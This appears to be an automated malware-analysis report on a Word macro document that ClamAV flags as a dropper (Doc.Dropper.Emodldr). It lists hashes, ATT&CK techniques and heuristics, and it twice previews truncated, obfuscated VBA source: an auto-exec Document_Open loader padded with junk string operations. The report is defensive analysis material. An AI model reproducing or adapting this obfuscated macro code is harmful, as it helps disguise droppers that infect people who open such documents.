Office (OLE) malware analysis — malicious · 058c184aa7406704

MALICIOUS

Office (OLE)

200.0 KB Created: 2018-04-17 23:59:00 Authoring application: Microsoft Office Word First seen: 2019-05-16

MD5: c8793b70cb2c89db726fac9a0313dfa8 SHA-1: 3dbb047c031bd72a1a44d93b1810675d497ed799 SHA-256: 058c184aa74067047be4a404be9bcdc0d625f1fc74a1aa5ccc8aa6238aa415d3

302 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1140 Deobfuscate/Decode Files or Information

The sample contains heavily obfuscated VBA macros, including an auto-exec loader that uses CreateObject and GetObject, indicative of a dropper. The ClamAV signature 'Doc.Dropper.Emodldr-6755244-0' further confirms its malicious nature as a dropper. The VBA code's obfuscation and use of execution functions suggest it is designed to download and execute a secondary payload.

Heuristics 8

ClamAV: Doc.Dropper.Emodldr-6755244-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Emodldr-6755244-0
VBA macros detected medium 5 related findings OLE_VBA_MACROS

Document contains VBA macro code
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER

Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
GetObject call high OLE_VBA_GETOBJ

GetObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 52764 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	52764 bytes
SHA-256: `4bfa175dd4d1a36a8d2c6b0a480ebe480429951923dad52946d8dcc2bfccda93`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Function MeyQzQ(iKzjizN As Integer, JnDpYb As Double, HFMocwH As Double, MxPSyiw As String) As String Qfjxcj = "]cydqFugW(lFk" + "$I_G)C$x_ycu@" + "Z?GiS%dJ-@f$DYmJ" pFUNre = StrReverse("G]lo#KzECGy") For QamGVx = 0 To 32 pFUNre = 211 - 1689 - 1045 pFUNre = Right("#@[jHH-.JsHptP", 4) GHlzq = RTrim(".^HS.lejc^OCkw(VVy") pFUNre = Space(3) pFUNre = StrReverse("xDBQDalhMyxbMfuKUnY") eGkcOhgC = 893 + 1406 + 787 pFUNre = "xL) lqp$[zRF(tkI" + "KKbKM?FP$LN" + "qTTuLWPK&RH" Qfjxcj = "_&Gbza(zME[DlHP" + "vG]ixAb$^B" + "Q^Rq]mmtc(AlRM" rxXUknI = "jFhfZsVwCkLZAqw%" + "QVXpe#GP#[vu K-J" + " zmH]yGIZ#YPs" Next QamGVx GHlzq = RTrim("bBcqGZ(Zuv.") YpBmS = StrReverse("^mY?aWE#WgiL%bz") vAQIH = 1271 - 104 - 1014 pFUNre = RTrim("( wjVxNy!YqaAi") GHlzq = Left("QaGQz#aQvgxE-lV", 5) YpBmS = LTrim("kv]DSnVpVZ]O@EL-CO") gtZBYHX = 751 + 1862 + 1868 YpBmS = UCase("qqH-WJc]h-rTNZhvqKBB") vAQIH = RTrim("nTCD#M@W-q&") eGkcOhgC = UCase(")^$]S]vST #M!aPAV") GHlzq = 941 - 1713 - 1571 For RRLSHM = 0 To 356 GHlzq = UCase("v AuZ(.W(G%?dUqYr^Ff") Qfjxcj = UCase("cat&&[ XKYEo") Next RRLSHM YpBmS = Left("mpJUcEnm)_TGC", 2) Qfjxcj = Space(17) gtZBYHX = "yU#ptamogPL(w_n%Kn" + "N!cyZ%JK%CHLPEuVl" + "r[h[Qmk@KhI)]bOy" eGkcOhgC = Left("lw(PM ddHx?ZyRS", 3) eGkcOhgC = RTrim("Wd)c&CMT nJ") eGkcOhgC = "zucacM_mzACHek^P" + "aSoLNJxfy-jE@WBDh" + "ZBRZpBFc[)WMj" GHlzq = StrReverse("tEpnc#rUjiG?Qc%-_-sA") gtZBYHX = "p][[&#%zNiJ" + "Vj(LYC%-h@dZgU.V.b" + "o(-OVVjAxFvx@tQbG" YpBmS = StrReverse("FIBduyIL!C") vAQIH = 960 - 1217 - 1231 MeyQzQ = "zpiTIfTsorEiiGNVbAotuqxzW" End Function Private Sub HLhqJS(xchKSrf As String, hvbtaWC As Double) For GGFdcR = 0 To 266 gtZBYHX = UCase("!^^fXDDFemMqwstBm@") pFUNre = UCase("X$@p.^OQZ!m?pIjPbtb") vAQIH = StrReverse("f@a(i$C&nl[R") gtZBYHX = LTrim("dfJcJG&%T_c-") gtZBYHX = StrReverse("[!TJ#ysmPWg") Qfjxcj = Right("h-UM$EF&&O@rB%", 5) vAQIH = 1570 - 519 - 146 gtZBYHX = "@Yl_?GvZ%%ZTUY" + "OUCcsDWRW&mXbmKv]" + "UXV(HX!_)o#)J]" gtZBYHX = LTrim(".bj!_qafrbrZbiDZ!") YpBmS = "EE(wfQ$YnpECDLm" + "EIRnCgy-z-lf" + "C_so)qflD.GKX(^qZ" Next GGFdcR pFUNre = "[fHleOLbLVy@V" + "f]T_xybZMGuvKdFBcT" + "_sQzAqJ]vau$z" rxXUknI = 413 + 1535 + 603 GHlzq = 1938 - 294 - 757 rxXUknI = Right("d#qokcgpo%", 5) Qfjxcj = Space(18) GHlzq = LTrim("arTgZcy F]c-bGmsXX") rxXUknI = Space(7) GHlzq = Space(3) YpBmS = UCase("xIl@DmXX!hp") GHlzq = RTrim("[xps)Jv#g.tia@^Puvu") eGkcOhgC = LTrim("EkI^Nf)ElKP") GHlzq = 1003 + 884 + 1067 For gNRIpP = 0 To 252 Qfjxcj = "D.IxFSl?!v[" + "HhbKoj -[Lc_MDR[-i" + "#EcF]zbMBh@" GHlzq = RTrim("JSAzd])_alWTTscfe%r") Next gNRIpP Qfjxcj = Left("MRN) -)UZrxRMVk[%[XY", 3) GHlzq = Right("lILk.xm@@aKU", 4) YpBmS = RTrim("NkgQ(C-nKx") vAQIH = Left("JzvY&&Zk^f$&ve", 4) While smjazU < 267 gtZBYHX = UCase("?$ocXb&JJ&Fb%w") GHlzq = 887 + 1079 + 489 vAQIH = RTrim("u_kHzPQRJM[A") YpBmS = "mdselLM#YRfb" + "phAsIQz%^PNo-BcNx#" + "]gm_jFeFfnjP" vAQIH = StrReverse("-.W.izyehXgXD") smjazU = smjazU + 1 Wend vAQIH = LTrim("vkkMYvZI)?") While loneNn < 229 YpBmS = LTrim("PpgYuRYmUquW^Wy") Qfjxcj = LTrim("Chxuzk@]vcBlkw") YpBmS = RTrim("ekR-zBMnVfZWQ)YU-djs") YpBmS = LTrim(".wylcLEy]G]QgN.") vAQIH = Left("[nBrpHGe.@P", 3) GHlzq = Right("Z!ehr$^Qb#r^vDP%", 4) loneNn = lon ... (truncated)

SHA-256: 4bfa175dd4d1a36a8d2c6b0a480ebe480429951923dad52946d8dcc2bfccda93

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function MeyQzQ(iKzjizN As Integer, JnDpYb As Double, HFMocwH As Double, MxPSyiw As String) As String
    Qfjxcj = "]cydqFugW(*lFk" + "$I_G)C$x_ycu@" + "Z?GiS*%dJ-@f$DYmJ"
    pFUNre = StrReverse("G]lo#KzECGy")
    For QamGVx = 0 To 32
        pFUNre = 211 - 1689 - 1045
        pFUNre = Right("#@[jHH-.JsHptP", 4)
        GHlzq = RTrim(".^HS.*lejc^OCkw(VVy")
        pFUNre = Space(3)
        pFUNre = StrReverse("xDBQDalhMyxbMfuKUnY")
        eGkcOhgC = 893 + 1406 + 787
        pFUNre = "xL) lqp$[zRF(tkI" + "KKbKM?FP$LN" + "qTTuLWPK&RH"
        Qfjxcj = "_&Gbza(zME[DlHP" + "vG]ixAb$^B" + "Q^Rq]mmtc(AlRM"
        rxXUknI = "jFhfZsVwCkLZA*qw%" + "QVXpe#GP#[vu K-J" + " zmH]yGIZ#YPs"
    Next QamGVx

    GHlzq = RTrim("bBcqGZ(Zuv.")
    YpBmS = StrReverse("^mY?aWE#WgiL%bz")
    vAQIH = 1271 - 104 - 1014
    pFUNre = RTrim("( wjVxNy!Yqa*Ai")
    GHlzq = Left("QaGQz#aQvgxE-lV", 5)
    YpBmS = LTrim("kv]DSnVpVZ]O@EL-CO")
    gtZBYHX = 751 + 1862 + 1868
    YpBmS = UCase("qqH-WJc]h-rTNZhvqKBB")
    vAQIH = RTrim("nTCD#M@W-q&")
    eGkcOhgC = UCase(")^$*]S]vST #M!aPAV")
    GHlzq = 941 - 1713 - 1571
    For RRLSHM = 0 To 356
        GHlzq = UCase("v AuZ(.W(G%?dUqYr^Ff")
        Qfjxcj = UCase("cat&&[ XKYEo")
    Next RRLSHM

    YpBmS = Left("mpJUcEnm)_TGC", 2)
    Qfjxcj = Space(17)
    gtZBYHX = "yU#ptamo*gPL(w_n%Kn" + "N!cyZ%JK%CHLPEuVl" + "r[h[Qmk@KhI)]bOy"
    eGkcOhgC = Left("lw(PM ddHx?ZyRS", 3)
    eGkcOhgC = RTrim("Wd)c&CMT nJ")
    eGkcOhgC = "zucacM_mzACHek^P" + "aSoLNJxfy-jE@WBDh" + "ZBRZpBFc[)WMj"
    GHlzq = StrReverse("tEpnc#rUjiG?Qc%-_-sA")
    gtZBYHX = "p][[&#%zNiJ" + "Vj(LYC%-*h@dZgU.V.b" + "o(-OVVjAxFvx@tQbG"
    YpBmS = StrReverse("FIBduyIL!C")
    vAQIH = 960 - 1217 - 1231
    MeyQzQ = "zpiTIfTsorEiiGNVbAotuqxzW"
End Function

Private Sub HLhqJS(xchKSrf As String, hvbtaWC As Double)
    For GGFdcR = 0 To 266
        gtZBYHX = UCase("!^^fXDDFemMqwstBm@")
        pFUNre = UCase("X$@p.^OQZ!m?pIjPbtb")
        vAQIH = StrReverse("f@a(i$C&nl[R")
        gtZBYHX = LTrim("dfJcJG&%T_c-")
        gtZBYHX = StrReverse("[!TJ#ysmPWg")
        Qfjxcj = Right("h-UM$EF&&O@rB%", 5)
        vAQIH = 1570 - 519 - 146
        gtZBYHX = "@Yl_?*GvZ%%ZTUY" + "OUCcsDWRW&mXbmKv]" + "UXV(HX!_)o#)J]"
        gtZBYHX = LTrim(".bj!_qafrbrZbiDZ!")
        YpBmS = "EE(wfQ$YnpECDLm*" + "EIRnCgy-z-lf" + "C_so)qflD.GKX(^qZ"
    Next GGFdcR

    pFUNre = "[f*HleOLbLVy@V" + "f]T*_xybZMGuvKdFBcT" + "_sQzAqJ]vau$z"
    rxXUknI = 413 + 1535 + 603
    GHlzq = 1938 - 294 - 757
    rxXUknI = Right("d#qokcgpo%", 5)
    Qfjxcj = Space(18)
    GHlzq = LTrim("arTgZcy F]c-bGmsXX")
    rxXUknI = Space(7)
    GHlzq = Space(3)
    YpBmS = UCase("xIl@DmXX!hp")
    GHlzq = RTrim("[xps)Jv#g.tia@^Puvu")
    eGkcOhgC = LTrim("EkI^Nf)ElKP")
    GHlzq = 1003 + 884 + 1067
    For gNRIpP = 0 To 252
        Qfjxcj = "D.IxFSl?!v[" + "HhbKoj -[Lc_MDR[-i" + "#EcF]zbMBh*@"
        GHlzq = RTrim("JSAzd])_alWTTscfe%r")
    Next gNRIpP

    Qfjxcj = Left("MRN) -)UZrxRMVk[%[XY", 3)
    GHlzq = Right("lILk.xm@@aKU", 4)
    YpBmS = RTrim("NkgQ(C-nKx")
    vAQIH = Left("JzvY&&Zk^f$&ve", 4)
    While smjazU < 267
        gtZBYHX = UCase("?$ocXb&JJ&Fb%w")
        GHlzq = 887 + 1079 + 489
        vAQIH = RTrim("u_kHzPQRJM[A")
        YpBmS = "mdselLM#YRfb" + "p*hAsIQz%^PNo-BcNx#" + "]gm_jFeFfnjP"
        vAQIH = StrReverse("-.W.izyehXgXD")
        smjazU = smjazU + 1
    Wend

    vAQIH = LTrim("vkkMYvZI)?")
    While loneNn < 229
        YpBmS = LTrim("PpgYuRYmUquW^Wy")
        Qfjxcj = LTrim("Chxuzk@]vcBl*kw")
        YpBmS = RTrim("ekR-zBMnVfZWQ)YU-djs")
        YpBmS = LTrim(".wylcLEy]G]QgN.*")
        vAQIH = Left("[nBrpHGe.@P", 3)
        GHlzq = Right("Z!ehr$^Qb#r^vDP%", 4)
        loneNn = lon
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.